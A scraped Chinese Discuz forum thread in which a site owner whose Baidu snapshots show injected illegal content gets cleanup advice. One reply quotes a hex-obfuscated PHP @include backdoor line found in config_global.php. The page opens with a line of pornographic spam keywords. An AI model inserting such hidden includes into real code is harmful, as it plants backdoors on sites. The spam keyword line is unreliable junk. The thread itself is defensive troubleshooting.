香蕉成人伊视频在线观看|学生小视频国产区|yy女主播啪啪啪视频|麻豆传播媒体APP大全免费版官网|瑜伽牲交AV|国产欧美日韩在线天堂区|白浆精品国产91

Discuz! 官方交流社區

標題: 求助升級最新版網站被非法內容劫持百度快照 [打印本頁]

作者: ghz0433    時間: 2019-8-26 19:29
標題: 求助升級最新版網站被非法內容劫持百度快照
我這個站www.3811111.com前幾天才上傳的6.22最新版
昨天發現百度收錄出現很多違法信息快照,以帖子好鏈接形式出現,門戶的鏈接也出現,數字沒有那么大,因為網站沒有那么多帖子,搞不懂是咋回事了,換了一個服務器還是一樣
(, 下載次數: 78)

(, 下載次數: 82)
(, 下載次數: 76)


作者: allthebest    時間: 2019-8-26 20:19

config下的config_global.php文件,找找惡意代碼,如:

@include(PACK('H*','443A2F777777726F6F742F78676C6C2E636F6D2F75706C6F61642F696E7374616C6C2F696E636C7564652F696E7374616C6C5F63696E74656E2E706870'));

近似的字符,直接刪除

更新緩存
作者: ghz0433    時間: 2019-8-27 09:10
allthebest 發表于 2019-8-26 20:19
config下的config_global.php文件,找找惡意代碼,如:

@include(PACK('H*','443A2F777777726F6F742F78676 ...

謝謝,我重新更換了服務器,備份數據庫下載最新的程序恢復,還是不行現在服務器爬滿了蜘蛛,蜘蛛爬那些鏈接都是數字很大的,說明根本不是爬我論壇的帖子
(, 下載次數: 84)

作者: allthebest    時間: 2019-8-27 16:05
ghz0433 發表于 2019-8-27 00:10
謝謝,我重新更換了服務器,備份數據庫下載最新的程序恢復,還是不行現在服務器爬滿了蜘蛛,蜘蛛爬那些鏈 ...

這與config下的config_global.php文件有關,檢查權限設置
作者: Fox    時間: 2019-8-27 17:47
提示: 作者被禁止或刪除 內容自動屏蔽
作者: 高二天    時間: 2019-10-17 11:52
allthebest 發表于 2019-8-26 20:19
config下的config_global.php文件,找找惡意代碼,如:

@include(PACK('H*','443A2F777777726F6F742F78676 ...

一萬個贊?。?!我跟樓主也一樣的
看到里面有@clude的這串代碼
請問還有哪些目錄呢?一起處理
作者: crx349    時間: 2019-10-17 15:25
高二天 發表于 2019-10-17 11:52
一萬個贊!?。∥腋鷺侵饕惨粯拥?br /> 看到里面有@clude的這串代碼
請問還有哪些目錄呢?一起處理 ...

建議官方文件恢復下 比較快
作者: 耗子    時間: 2019-10-17 15:50



木馬問題不是在程序本身,而是服務器的權限, 是某種的木馬偽裝成圖片 通過上傳頭像 帖子等方式就上傳到你服務器上了,要命的是你服務器還允許執行,
單純的清理木馬沒用的 要服務器的安全最主要
您可以加我QQ交談,有償服務,專業清理+安防




歡迎光臨 Discuz! 官方交流社區 (http://m.yu-jie.cn/) Powered by Discuz! X5.0